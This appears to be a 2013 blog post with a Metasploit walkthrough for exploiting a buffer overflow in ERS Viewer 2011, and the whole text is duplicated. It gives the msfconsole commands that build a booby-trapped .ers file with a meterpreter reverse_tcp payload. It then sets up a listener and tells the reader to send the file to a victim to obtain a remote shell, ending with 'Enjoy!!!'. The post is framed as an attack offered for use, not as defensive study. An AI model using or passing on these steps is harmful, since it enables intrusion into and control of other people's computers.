Exploit Remote PC using ERS
Exploit Remote PC using ERS
Viewer 2011 ERS File Handling
Buffer Overflow
This module exploits a buffer
overflow vulnerability found in
ERS Viewer 2011 (version 11.04).
The vulnerability exists in the
module ermapper_u.dll where
the functionERM_convert_to_
correct_webpath handles user
provided data in a insecure way.
It results in arbitrary code
execution under the context of
the user viewing a specially
crafted .ers file. This module has
been tested successfully with ERS
Viewer 2011 (version 11.04) on
Windows XP SP3 and Windows 7
SP1.
Exploit Targets
ERS Viewer 2011 (v11.04)
Requirement
Attacker : Backtrack 5
Victim PC: Windows 7
Open backtrack terminal
type msfconsole
Now type use exploit/windows/
fileformat/erdas_er_viewer_bof
msf exploit (erdas_er_viewer_
bof)>set payload windows/
meterpreter/reverse_tcp
msf exploit (erdas_er_viewer_
bof)>set lhost 192.168.0.106 (IP
of Local Host)
msf exploit (erdas_er_viewer_
bof)>exploit
After we successfully generate the malicious ers File, it will
stored on your local computer
/root/.msf4/local/msf.ers
Now we need to set up a listener
to handle reverse connection
sent by victim when the exploit
successfully executed.
use exploit/multi/handler
set payload windows/
meterpreter/reverse_tcp
set lhost 192.168.0.106
exploit
Now send your msf.ers files to
victim, as soon as they download
and open it. Now you can access
meterpreter shell on victim
computer
Enjoy!!!
Viewer 2011 ERS File Handling
Buffer Overflow
This module exploits a buffer
overflow vulnerability found in
ERS Viewer 2011 (version 11.04).
The vulnerability exists in the
module ermapper_u.dll where
the functionERM_convert_to_
correct_webpath handles user
provided data in a insecure way.
It results in arbitrary code
execution under the context of
the user viewing a specially
crafted .ers file. This module has
been tested successfully with ERS
Viewer 2011 (version 11.04) on
Windows XP SP3 and Windows 7
SP1.
Exploit Targets
ERS Viewer 2011 (v11.04)
Requirement
Attacker : Backtrack 5
Victim PC: Windows 7
Open backtrack terminal
type msfconsole
Now type use exploit/windows/
fileformat/erdas_er_viewer_bof
msf exploit (erdas_er_viewer_
bof)>set payload windows/
meterpreter/reverse_tcp
msf exploit (erdas_er_viewer_
bof)>set lhost 192.168.0.106 (IP
of Local Host)
msf exploit (erdas_er_viewer_
bof)>exploit
After we successfully generate the malicious ers File, it will
stored on your local computer
/root/.msf4/local/msf.ers
Now we need to set up a listener
to handle reverse connection
sent by victim when the exploit
successfully executed.
use exploit/multi/handler
set payload windows/
meterpreter/reverse_tcp
set lhost 192.168.0.106
exploit
Now send your msf.ers files to
victim, as soon as they download
and open it. Now you can access
meterpreter shell on victim
computer
Enjoy!!!
posted by buznorpoor @ May 17, 2013
0 Comments
0 Comments:
Post a Comment
Subscribe to Post Comments [Atom]
<< Home